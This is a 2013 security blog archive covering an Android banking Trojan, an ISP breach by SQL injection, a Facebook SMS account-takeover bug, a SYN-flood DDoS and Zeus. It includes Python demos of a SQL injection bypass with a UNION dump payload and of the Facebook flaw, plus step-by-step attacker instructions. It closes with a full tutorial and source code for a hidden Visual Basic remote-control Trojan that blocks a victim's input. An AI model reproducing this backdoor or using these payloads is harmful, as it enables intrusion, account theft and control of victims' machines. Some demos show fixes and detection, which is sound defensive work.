Thursday, October 24, 2013

New Android Banking Trojan targeting Korean users
Android banking Trojans are a very profitable line for mobile malware developers: they infect phones and steal passwords and other data when victims log on to their online bank accounts.

One recent trend is Android malware that targets users in specific countries, such as several European countries, Brazil and India.
The antivirus vendor Malwarebytes has noticed a new threat, distributed via file-sharing sites and alternative app markets over the last few months, that targets Korean users.

Dubbed 'Android/Trojan.Bank.Wroba', the malware disguises itself as the Google Play Store app and runs as a background service to monitor events.
"This enables it to capture incoming SMS, monitor installed apps and communicate with a remote server."
According to the researcher, after installation the malware looks for targeted banking applications on the device, removes them and downloads a malicious version to replace each one. The removal step is necessary: Android refuses to install an APK that reuses an installed package name under a different signing key, so the legitimate app has to go first, and both the uninstall and the install of the replacement normally require the user to confirm a system prompt.
"The malicious version will contain the exact Package Name and look very similar to the legitimate app, but contains malicious code with no banking functionality."
The attackers aim to obtain login credentials that give them access to the victim's bank account: the fake banking application installed in the second step captures the banking credentials and other useful data, which the attackers then monetise.

Android is not the only mobile operating system at risk from such attacks: the recently launched Firefox OS saw its first mobile malware surface a few days ago.

Hacker stole $100,000 from users of California based ISP using SQL Injection

In 2013 we have seen a dramatic increase in the number of attacks attempted against banks, credit unions and utility companies, using techniques including DDoS attacks, SQL injection, DNS hijacking and zero-day flaws.

SQL injection is one of the most common security vulnerabilities on the web, and it succeeds only when the web application fails to keep user input separate from the query it builds.
Recently a hacking group named 'TeamBerserk' claimed on Twitter that they had stolen $100,000 by using user names and passwords taken from the California ISP Sebastian (Sebastiancorp.com) to access victims' bank accounts.

A proof-of-concept video uploaded to the Internet shows how the hackers used a SQL injection attack against Sebastian to access its customer database, which included e-mail addresses, user names and clear-text passwords, and then used the same data to steal money from those customers.

Let's see what SQL Injection is and how serious an attack like this actually can be.

SQL injection is a web application vulnerability in which the attacker adds Structured Query Language (SQL) code to web inputs so that it becomes part of the query the application runs against its database. Using this technique, attackers can map the structure and location of key databases, dump their contents, or compromise the database server itself.

The hackers took just 15 minutes to break into the website using sqlmap (an automated SQL injection tool), stole the customer database and then immediately accessed a victim's Gmail account, linked PayPal account and bank accounts.
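As an added example (not code from the article, from Sebastian or from sqlmap), here is the pattern behind such a breach, using Python's built-in sqlite3 and a constructed two-row customer table: the login query built by string concatenation is bypassed with a quote and a comment, the same hole dumps the whole table through a UNION (which is what sqlmap automates), the parameterised query is unaffected, and the two hashing functions show what the table should have stored instead of clear-text passwords.

```python
"""A login query built by string concatenation beside a parameterised one,
plus the password storage that keeps a dumped table from yielding clear-text
passwords. Added example: not code from Sebastian, TeamBerserk or sqlmap;
the customers table and its two rows are constructed for the demo."""
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """Constructed stand-in for the ISP's customer table (clear-text passwords)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?, ?)",
        [(1, "alice", "alice@example.net", "Summer2013!"),
         (2, "bob", "bob@example.net", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so quotes in it become SQL."""
    sql = ("SELECT username FROM customers WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same query with bound parameters: input stays data, never SQL."""
    sql = "SELECT username FROM customers WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def dump_via_union(conn):
    """What sqlmap automates: a UNION that returns every row of the table
    through the single column the login query exposes."""
    payload = ("x' UNION SELECT username || ':' || email || ':' || password "
               "FROM customers --")
    return sorted(login_vulnerable(conn, payload, ""))


def hash_password(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a per-user salt; store this, not the password."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute from the stored salt and compare in constant time."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice' --", "wrong"))   # ['alice']: auth bypass
    print(login_safe(db, "alice' --", "wrong"))         # []
    print(dump_via_union(db))                           # every row, clear text
    print(hash_password("hunter2"))                     # what should be stored
```

Even with the query fixed, a table of hashed passwords is the only thing that limits the damage of the next bug: the UNION dump above would then yield salted PBKDF2 strings that cannot be replayed against Gmail or PayPal.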

It is hard to remember multiple passwords, so some people just use the same one over and over. Is your Facebook password the same as your Twitter password? How about the password for your bank's website?

The hack shows why it is extremely dangerous to use the same password on more than one web site. In the POC video the hacker picks one Sebastian username at random and tries its password against the PayPal, Gmail and even Citibank logins, and it actually works, because the victim used the same password everywhere.

Now that you know how this happens, don't let it happen to you. If you have a bank account, a few credit cards and several other sensitive accounts, conduct a thorough security audit of them: check when you last logged in, and use a different, strong password for each website (a password manager makes that practical).

Hacking Facebook Account with just a text message

Can you imagine that a single text message is enough to hack any Facebook account, without user interaction and without any other malicious tooling such as Trojans, phishing or keyloggers?

Today we explain how a UK-based security researcher, "fin1te", was able to take over any Facebook account within a minute by sending one SMS.

Most of us are Facebook users, so we know there is an option to link your mobile number to your account, which lets you receive account updates via SMS and also lets you log in with that linked number instead of your email address or username.
According to the researcher, the loophole was in the phone number linking process, or in technical terms at the endpoint /ajax/settings/mobile/confirm_phone.php.

This page runs in the background when the user submits his phone number together with the verification code that Facebook sent to the phone. The submission form has two main parameters: one for the verification code, and a second, profile_id, naming the account to link the number to. The flaw is that the server trusted the profile_id supplied by the client rather than the account that owned the session, so a code issued to the attacker's own phone could be confirmed against any account.

As the attacker, follow these steps to execute the hack:
  1. Change the value of profile_id to the victim's profile_id by tampering with the form parameters.
  2. Send the letter F to 32665, Facebook's SMS shortcode in the UK. You will receive an 8-character verification code back.
  3. Enter that code in the box, or as the confirmation_code parameter value, and submit the form.

Facebook accepts the confirmation code and the attacker's mobile number is linked to the victim's Facebook profile.
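The steps above, reduced to the one server-side mistake, as an added example that is not Facebook's code: the in-memory ACCOUNTS and PENDING_CODES tables, the profile ids 1001 (victim) and 2002 (attacker), the phone numbers and the code format are all assumptions made up for the demo. The vulnerable handler links the phone to whatever profile_id the form carries; the fixed handler ignores the parameter and uses the session's own account, which is what Facebook did after the report.

```python
"""The confirm_phone flow with the bug fin1te reported: the handler links the
phone to whichever profile_id the client sends, instead of the account that
owns the session. Added example, not Facebook's code; the in-memory tables,
user ids, phone numbers and code format are assumptions for the demo."""
import secrets

ACCOUNTS = {}        # profile_id -> linked phone number (constructed)
PENDING_CODES = {}   # verification code -> phone that requested it


def reset_state():
    """Two constructed accounts: 1001 is the victim, 2002 the attacker."""
    ACCOUNTS.clear()
    ACCOUNTS.update({1001: None, 2002: None})
    PENDING_CODES.clear()


def request_code(phone):
    """Step 2: texting F to the shortcode returns an 8-character code."""
    code = secrets.token_hex(4)   # 8 hex characters
    PENDING_CODES[code] = phone
    return code


def confirm_phone_vulnerable(session_profile_id, form):
    """Links the phone to form['profile_id'], a value the client controls."""
    target = int(form["profile_id"])
    phone = PENDING_CODES.pop(form["confirmation_code"], None)
    if phone is None or target not in ACCOUNTS:
        return False
    ACCOUNTS[target] = phone
    return True


def confirm_phone_fixed(session_profile_id, form):
    """Links the phone to the logged-in account only; profile_id is ignored."""
    phone = PENDING_CODES.pop(form["confirmation_code"], None)
    if phone is None:
        return False
    ACCOUNTS[session_profile_id] = phone
    return True


def password_reset_target(profile_id):
    """Where the 'Forgot password' recovery code would be texted."""
    return ACCOUNTS[profile_id]


def run_attack(handler, attacker_id=2002, victim_id=1001,
               attacker_phone="+447700900123"):
    """Whole chain from the attacker's session; returns the phone that
    would receive the victim's password-reset code."""
    reset_state()
    code = request_code(attacker_phone)
    form = {"profile_id": str(victim_id), "confirmation_code": code}
    handler(attacker_id, form)
    return password_reset_target(victim_id)


if __name__ == "__main__":
    print(run_attack(confirm_phone_vulnerable))   # attacker's phone
    print(run_attack(confirm_phone_fixed))        # None: victim untouched
```

The lesson generalises beyond phone linking: any "which object does this act on" parameter that the client can set must be cross-checked against the session's own identity or an explicit authorisation rule, and one-time codes must be bound to the account they were issued for, not only to the phone.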

In the next step the hacker just needs to go to the Forgot password option and initiate a password reset request against the victim's account.

The password recovery code is now sent to the attacker's own mobile number, which the steps above linked to the victim's account. Enter the code and reset the password!

Facebook no longer accepts the profile_id parameter from the client after receiving the bug report from the researcher.

In return, Facebook paid fin1te $20,000 as a bug bounty.

World's 3rd Largest Chinese Bitcoin exchange hit by 100Gbps DDoS attack

In March of this year we saw the first ever 300 Gbps DDoS attack, made possible by a DNS reflection and amplification attack against Spamhaus.

On 24 September the world's third largest Bitcoin exchange, BTC China, a platform where both Bitcoin and Chinese yuan are traded, faced a massive DDoS attack that continued for nine hours and used no amplification techniques at all.
Incapsula, a cloud-based security service provider, helped the exchange withstand the denial-of-service attack and successfully mitigated it.

Incapsula tweeted a graph of the attack last month, as shown: "Yesterday we prevented a ~100Gbps DDoS. The attack's load was distributed across our 350Gbps network."
A specialist at Incapsula shared details of the attack with The Register, explaining that "The attack against BTC China took the form of a SYN flood rather than the DNS amplification-style attack" and that "The attacker balanced the assault between small, high frequency SYN packets, and large, low-frequency SYN packets."
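What such a flood looks like at the victim, and the heuristics that separate it from a busy but healthy server, as an added example that is not Incapsula's tooling: the capture below is constructed in tcpdump's text format (it is not from the BTC China attack), and the thresholds are assumptions. A legitimate client finishes the handshake with an ACK; flood sources never do, and since a normal SYN carries no payload ("length 0" in tcpdump), the "large SYN packets" Incapsula describes stand out on their own.

```python
"""SYN-flood heuristics over tcpdump-style packet summaries: handshake
completion ratio, distinct sources, SYN rate, and SYNs that carry payload.
Added example, not Incapsula's code; the capture is constructed and the
thresholds are assumptions."""
import re

LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\].*"
    r"length (?P<length>\d+)$"
)


def parse(lines):
    """Keep only the TCP lines tcpdump prints with Flags [...] and a length."""
    pkts = []
    for line in lines:
        m = LINE.match(line)
        if m:
            p = m.groupdict()
            h, mnt, s = p["ts"].split(":")
            p["t"] = int(h) * 3600 + int(mnt) * 60 + float(s)
            p["dport"] = int(p["dport"])
            p["length"] = int(p["length"])
            pkts.append(p)
    return pkts


def syn_flood_verdict(pkts, dst, dport, min_syns=20, max_completed=0.5):
    """Per-flow handshake bookkeeping for traffic to dst:dport."""
    syn_len = {}    # (src, sport) -> payload bytes carried by the SYN
    syn_time = {}
    acked = set()   # flows whose client sent the third-step ACK
    for p in pkts:
        if p["dst"] != dst or p["dport"] != dport:
            continue
        key = (p["src"], p["sport"])
        if p["flags"] == "S":
            syn_len[key] = p["length"]
            syn_time[key] = p["t"]
        elif p["flags"] == "." and key in syn_len:
            acked.add(key)
    n = len(syn_len)
    span = (max(syn_time.values()) - min(syn_time.values())) if n else 0.0
    completed = len(acked) / n if n else 1.0
    return {
        "syns": n,
        "sources": len({src for src, _ in syn_len}),
        "syn_rate": n / span if span > 0 else float(n),
        "completed_ratio": completed,
        "payload_syns": sum(1 for size in syn_len.values() if size > 0),
        "flood": n >= min_syns and completed <= max_completed,
    }


def constructed_capture():
    """Synthetic lines: three normal handshakes, then 30 bare SYNs from
    distinct spoofed sources and four SYNs padded to 1400 bytes."""
    srv = "198.51.100.10.443"
    lines = []
    for i in range(3):
        c = "192.0.2.%d.5000%d" % (i + 1, i)
        lines += [
            "13:02:15.%06d IP %s > %s: Flags [S], seq 1, win 65535, length 0" % (i * 1000, c, srv),
            "13:02:15.%06d IP %s > %s: Flags [S.], seq 9, ack 2, win 65535, length 0" % (i * 1000 + 100, srv, c),
            "13:02:15.%06d IP %s > %s: Flags [.], ack 10, win 65535, length 0" % (i * 1000 + 200, c, srv),
        ]
    for i in range(30):
        lines.append("13:02:16.%06d IP 203.0.113.%d.40000 > %s: Flags [S], seq 1, win 8192, length 0"
                     % (i * 3000, i + 1, srv))
    for i in range(4):
        lines.append("13:02:16.%06d IP 203.0.113.%d.40000 > %s: Flags [S], seq 1, win 8192, length 1400"
                     % (i * 25000, 100 + i, srv))
    return lines


if __name__ == "__main__":
    print(syn_flood_verdict(parse(constructed_capture()), "198.51.100.10", 443))
```

On a real capture you would run `tcpdump -nn -tt 'tcp[tcpflags] & (tcp-syn|tcp-ack) != 0' ` against the exposed address and feed the lines in; the completion ratio is the robust signal, since an attacker can vary packet sizes and rates but cannot complete a handshake from a spoofed source.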

The DNS reflection denial-of-service (DrDoS) technique abuses open DNS resolvers, which answer queries from anyone and typically sit on high-bandwidth Internet connections: the attacker sends small queries with the victim's address spoofed as the source, and the resolvers deliver their much larger responses to the victim.

But to generate a 100 Gbps attack without DNS reflection, the attacker needs a network of many compromised servers with very high bandwidth. "This amount of fire power isn't cheap, or readily available, signifying a big step up in resources pulled together to launch this type of attack," according to Incapsula.

Once Incapsula stepped in to defend BTC China, the assault dropped to a manageable level. "The attackers either ran out of resources or money. It's also possible they gave up after they realised they were not making headway," Incapsula co-founder Marc Gaffan said.

As of today, China's largest search engine, Baidu, has become the first service of its kind to accept Bitcoin payments for one of its DDoS protection services.

Monday, April 1, 2013

Zeus still king of the botnets


Years after its release into the wild, the Zeus malware remains the most popular botnet family on the web.
Researchers at McAfee found that the financially oriented malware is by far the largest botnet family, accounting for 57.9 percent of the botnet infections the company has logged so far in 2013. No other botnet on the list reached more than a nine percent share.
Since its first major outbreaks in 2009, Zeus has been a persistent thorn in the side of the security community.
Renowned for operating without tipping off users, Zeus infections reside locally on the victim's PC and inject code directly into the browser before a page is displayed. This lets Zeus variants add data input fields to, or redirect submissions from, an otherwise legitimate website; because the tampering happens inside the browser after TLS decryption, the bank's HTTPS connection offers no protection against it.
According to McAfee researcher Neeraj Thakar, the polymorphic nature of Zeus, which lets the malware constantly change its own code, makes signature-based detection all but impossible in the wild.
"Bot masters have become so advanced and organized that they can churn out thousands of undetectable and unique malware binaries each day," Thakar wrote.
"That coupled with the ability to rapidly change the control-server hosting infrastructure allows them to stay active longer without being taken down."
The spread of Zeus continues despite efforts by security vendors to take down the various botnets built on the platform. Microsoft recently sued two men in the UK over their involvement in Zeus botnets.
Still, McAfee estimates that as many as 37 percent of the 8.5 million malware samples it has analysed this year are linked to known botnets, largely variants of Zeus.

Saturday, March 2, 2013

Hacking Joomla with Exploit Video


Make a simple Trojan in VB

Visual Basic is an easy programming language, so easy that most advanced programmers don't even compare it to behemoths like C, Pascal, C++ or Perl. But it seriously packs a punch because of how easy it is to program and the predefined procedures it ships with. Earlier I wrote on how to lock the keyboard and mouse using VB. This time I will be discussing how to write a simple Trojan in VB. Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications, both with fewer than 100 lines of code. The first application is the client, the program the user knows about. The second is the server, the actual "Trojan" part. I will now go through what you need for both and some sample code.
Server
The server is the Trojan part of the program. You usually want it to be as hidden as possible so the average user can't find it. To do this you start with
Private Sub Form_Load()
     Me.Visible = False
End Sub
This little bit of code makes the form invisible. The Task Manager is a little bit peskier, so to hide the application from its list of running applications we make the code look like this.
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub
So now we have a program that is virtually invisible to the average user, and it only took four lines of code. Keep in mind what this does and does not hide: App.TaskVisible only keeps the window out of the Task Manager's Applications tab; the process still shows up in the Processes tab, and the port it will listen on below shows up in netstat. Now all of you are thinking that this tutorial sucks right about now, so let's make it a lot better by adding functions to our Trojan!
The first thing we want is for it to listen for connections when it loads. To do this we need to add a Winsock control. I named my control win, but you can name yours whatever you like.
To make it listen on port 2945 when the Trojan starts up, we make our code look like this.
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2945
     win.RemotePort = 455
     win.Listen
End Sub
This code sets the local listening port to 2945. The RemotePort line is harmless but does nothing for a listening socket: the remote port of an accepted connection is whatever port the connecting client happens to use. So now we have a program that listens but still doesn't do anything neat. Let's make it block the user's input completely when we tell it to!
To do this devious thing we need to add a module with the following code
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long
Then we add this code to our main form:
Private Sub win_ConnectionRequest(ByVal requestID As Long)
     ' Drop any current connection and take the new one
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     Dim GotDat As String
     ' Read whatever arrived and hand it to the command dispatcher
     win.GetData GotDat
     DoActions GotDat
End Sub
The line in the module is a Windows API declaration: it tells VB to call the BlockInput function exported by user32.dll. This code still won't block the user's input, but we are very close. We now need to write the DoActions function that the main form calls. In case you were wondering, the code we added to the form does two things: the first sub accepts every incoming connection request (closing any existing connection first), and the second sub reads whatever data arrives and passes it to DoActions, which we are about to code.
For the DoActions code we want a public function in the module. Add this code to the module and we are about done with the server side of the Trojan!
Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function
Ok, now we have a program that blocks the user's input when the string "block" is sent to it on port 2945. I used a Select Case statement so it is easy to add your own commands later. I recommend adding an unblock command of your own: just call BlockInput with the argument False instead of True. One caveat: BlockInput is subject to User Interface Privilege Isolation on Windows Vista and later, so a process can only block input for windows at its own integrity level or lower; run as a normal user it will not stop input to elevated windows.
Main Form
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2945
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     Dim GotDat As String
     win.GetData GotDat
     DoActions GotDat
End Sub
Remember to add your Winsock control and name it win if you use this code.
That's all there is to the server side, the Trojan part of it. Now on to the client.
Client
The client is what you will interact with. You use it to connect to the remote server (the Trojan) and send it commands. Since we made a server that accepts the command "block", let's make a client that sends the command "block".
Make a form and add a Winsock control, a text box and three buttons. The Winsock control should be named Win and the text box txtIP if you want them to work with this code, and your buttons should be named cmdConnect, cmdBlockInput and cmdDisconnect. Now let's look at the code for our client.
Private Sub cmdConnect_Click()
     Dim IpAddy As String
     IpAddy = txtIP.Text
     ' Reset the socket, then connect to the Trojan's listening port
     Win.Close
     Win.RemotePort = 2945
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub

Private Sub cmdBlockInput_Click()
     ' The server's DoActions matches this string exactly
     Win.SendData "block"
End Sub
That is the code for the client. All it does is take the IP address from txtIP and connect to it on remote port 2945; once connected, the button sends the string "block" to block the user's input. Two things to keep in mind: TCP is a stream, so the server's Select Case only matches because the client sends exactly "block" on an otherwise idle connection (a real protocol would frame its messages), and the fixed LocalPort of 9999 can make a reconnect fail while the previous socket is still in TIME_WAIT, so leaving LocalPort at 0 and letting Windows pick a port is the safer choice.
This completes the tutorial on making a simple Trojan in VB.